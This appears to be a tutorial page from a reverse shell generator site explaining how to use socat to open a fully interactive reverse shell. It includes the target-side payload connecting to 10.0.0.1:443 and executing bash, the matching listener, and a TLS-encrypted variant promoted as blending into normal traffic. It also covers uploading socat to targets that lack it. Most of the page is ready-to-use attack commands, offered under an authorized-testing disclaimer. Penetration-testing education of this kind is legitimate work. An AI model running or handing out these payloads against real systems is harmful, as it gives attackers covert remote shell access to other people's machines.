Skip to content
reverseshell

Socat Reverse Shell: A Fully Interactive TTY Without the stty Dance

How a socat reverse shell gives you a fully interactive PTY out of the box, plus the encrypted OPENSSL variant — when socat is available on the target.

Published on 3 min read
socatreverse-shelltty

Socat is what you use when you want the good shell immediately. Where a netcat or bash one-liner drops you into a raw, half-broken session that you then have to upgrade by hand, socat can allocate a pseudo-terminal on both ends and hand you a fully interactive shell — job control, Ctrl-C, vi, sudo prompts — from the first second. The catch: socat has to be present on the target, and it often is not.

The Fully Interactive Payload

On the target:

socat TCP:10.0.0.1:443 EXEC:'bash -li',pty,stderr,setsid,sigint,sane

On your machine, the listener has to match by allocating a PTY too:

socat file:`tty`,raw,echo=0 TCP-LISTEN:443

What the options buy you:

  • pty allocates a pseudo-terminal — the reason the shell is interactive.
  • stderr routes error output back over the channel.
  • setsid runs the shell in a new session so it owns the terminal.
  • sigint passes Ctrl-C to the remote process instead of killing your shell.
  • sane sets sensible terminal modes.

The listener's file:\tty`,raw,echo=0wires your own terminal in raw mode so keystrokes pass through untouched. This pairing is what removes thepython -c 'pty.spawn'+stty raw -echo` ritual described in upgrading a reverse shell — socat does it for you.

The Encrypted Variant (OPENSSL)

Socat speaks TLS, which both protects the session and helps it blend into normal egress. Generate a cert on your listener:

openssl req -newkey rsa:2048 -nodes -keyout s.key -x509 -days 90 -out s.crt
cat s.key s.crt > s.pem

Listener:

socat OPENSSL-LISTEN:443,cert=s.pem,verify=0 file:`tty`,raw,echo=0

Target:

socat OPENSSL:10.0.0.1:443,verify=0 EXEC:'bash -li',pty,stderr,setsid,sigint,sane

verify=0 skips certificate validation — fine for a self-signed test cert. Both ends must agree on OPENSSL; a plaintext listener against a TLS payload is the classic "connected then died" symptom (see choosing a listener).

The Availability Problem

Socat is not installed by default on most systems. Two options when it is missing:

  1. Upload a static socat binary to a writable path and run it from there.
  2. Get a basic shell first with bash/netcat/python, then use that to stage socat (or just upgrade the shell you have).

If you cannot get socat onto the box, fall back to a bash or netcat one-liner and upgrade manually.

When It Won't Connect

  1. socat not on target — upload it or use another payload.
  2. OPENSSL mismatch — both ends must use TLS, or neither.
  3. Egress filtered — prefer 443/80.

Full triage: why reverse shells fail.

Generate It

The reverse shell generator emits the socat payload — plaintext or OPENSSL — with your LHOST/LPORT filled in and the matching file:\tty`` listener beside it, so the interactive shell is one copy-paste away when socat is available.

Authorized Testing Only

Use socat reverse shells only against systems you own or are explicitly authorized to test. Authorization is what makes it legitimate.

Related articles

What Is a Reverse Shell? A Practical Guide for Authorized Testing
A plain-English explanation of how reverse shells work, why they beat bind shells through firewalls, and how a reverse shell generator saves you from copy-paste mistakes.
reverse-shellfundamentalsgenerator
Bash Reverse Shell One-Liners: How /dev/tcp Actually Works
The common bash reverse shell one-liners explained line by line, why they need bash (not sh), and how to fall back when /dev/tcp is missing.
bashreverse-shelllinux
Python Reverse Shell: One-Liners That Survive python vs python3
How the python reverse shell one-liner works with socket and pty, why the python/python3 split breaks payloads, and a version-agnostic fallback.
pythonreverse-shelllinux